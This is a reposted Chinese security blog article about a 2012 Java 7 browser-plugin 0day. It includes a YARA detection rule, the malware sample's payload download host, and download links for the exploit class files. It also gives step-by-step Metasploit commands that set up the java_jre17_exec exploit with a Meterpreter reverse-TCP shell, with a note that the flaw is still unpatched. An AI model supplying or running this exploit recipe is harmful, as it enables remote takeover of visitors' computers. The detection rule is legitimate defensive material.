当前位置: 首页 > news >正文

最新Java 0day漏洞分析及EXP下载

FireEeye在8月27日发布了一个新的java 0day的一些相关信息,该漏洞影响浏览器的JRE[1.7.x]插件,影响非常大,攻击者可利用该漏洞进行挂马攻击。在捕获的样本中发现使用了Dadong’s JSXX 0.44 VIP加密方式。

 
022606MLn 最新Java 0day漏洞分析及EXP下载
 

该java程序中包含了以下两个类文件:(Gondzz.class下载  Gondvv.class下载

- cve2012xxxx/Gondzz.class - cve2012xxxx/Gondvv.class

 

该程序会检查系统运行的版本,如果系统存在漏洞,payload就会被下载。注意观察代码中“我有一只小毛驴,从来也不骑”,如下图:

 
022607Pip 最新Java 0day漏洞分析及EXP下载
 

rule Java0daycve2012xxxx_generic
{
meta:
weight=100
author = “Jaime Blasco”
source = “alienvault”
date = “2012-08″
strings:
$ = ”java/security/ProtectionDomain”
$ = “java/security/Permissions”
$ = “java/security/cert/Certificate”
$ = “setSecurityManager”
$ = “file:///”
$ = “sun.awt.SunToolkit”
$ = “getField”
condition:
all of them
}

Metasploit 已经发布了该漏洞利用的模块,需要测试的同学可以迅速更新下载,如下图:

 
022608B13 最新Java 0day漏洞分析及EXP下载

分析样本是从ok.aa24.net / meeting / hi.exe下载恶意文件,检测结果如下:
https://www.virustotal.com/file/09d10ae0f763e91982e1c276aad0b26a575840ad986b8f53553a4ea0a948200f/analysis/1346055031/

使用方法:
use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

 

Youtube观看演示过程(翻墙)EXP下载
此漏洞影响JRE[1.7.x]插件,不影响java 6及以下
影响浏览器:iE、Firefox、opera、chrome
目前尚未补丁!

http://www.cnlvke.com/archives/5553.html

相关文章:

  • MYSQL 外链设置语句
  • MySQL安全配置详解
  • Netcms oday 漏洞
  • Asp.net的登录验证方法Web.config访问权限配置
  • 放入conn.asp中(拒绝攻击 万能Asp防注入代码)
  • phpcms后台普通用户读文件0day及修复
  • Kesion cms 路径泄露漏洞
  • asp中容错语句的使用
  • 防止SQL注入
  • 解决ASP防SQL注入攻击程序问题
  • Discuz7.X通杀0day(UCenter Home-2.0) poc
  • Kracker路由器破解工具
  • 代码之美 - 如何写出优雅的PHP代码
  • Mysql数据库的安全设置方法大全
  • Struts 2实现文件过滤
  • [原]深入对比数据科学工具箱:Python和R 非结构化数据的结构化
  • 4个实用的微服务测试策略
  • CEF与代理
  • CSS 三角实现
  • gcc介绍及安装
  • k8s如何管理Pod
  • macOS 中 shell 创建文件夹及文件并 VS Code 打开
  • MyEclipse 8.0 GA 搭建 Struts2 + Spring2 + Hibernate3 (测试)
  • oldjun 检测网站的经验
  • SpingCloudBus整合RabbitMQ
  • vue学习系列(二)vue-cli
  • 我的zsh配置, 2019最新方案
  • 原生JS动态加载JS、CSS文件及代码脚本
  • Android开发者必备:推荐一款助力开发的开源APP
  • 宾利慕尚创始人典藏版国内首秀,2025年前实现全系车型电动化 | 2019上海车展 ...
  • ​ ​Redis(五)主从复制:主从模式介绍、配置、拓扑(一主一从结构、一主多从结构、树形主从结构)、原理(复制过程、​​​​​​​数据同步psync)、总结
  • ​低代码平台的核心价值与优势
  • ​如何防止网络攻击?
  • ​学习一下,什么是预包装食品?​
  • #QT项目实战(天气预报)
  • #Spring-boot高级
  • $(selector).each()和$.each()的区别
  • $.ajax()
  • $.extend({},旧的,新的);合并对象,后面的覆盖前面的
  • (13):Silverlight 2 数据与通信之WebRequest
  • (17)Hive ——MR任务的map与reduce个数由什么决定?
  • (2022 CVPR) Unbiased Teacher v2
  • (android 地图实战开发)3 在地图上显示当前位置和自定义银行位置
  • (附源码)springboot美食分享系统 毕业设计 612231
  • (力扣题库)跳跃游戏II(c++)
  • (终章)[图像识别]13.OpenCV案例 自定义训练集分类器物体检测
  • (转)EXC_BREAKPOINT僵尸错误
  • (转)memcache、redis缓存
  • (转)利用PHP的debug_backtrace函数,实现PHP文件权限管理、动态加载 【反射】...
  • .class文件转换.java_从一个class文件深入理解Java字节码结构
  • .gitignore文件—git忽略文件
  • .NET 6 Mysql Canal (CDC 增量同步,捕获变更数据) 案例版
  • .Net 6.0 处理跨域的方式
  • .NET Core工程编译事件$(TargetDir)变量为空引发的思考
  • .net FrameWork简介,数组,枚举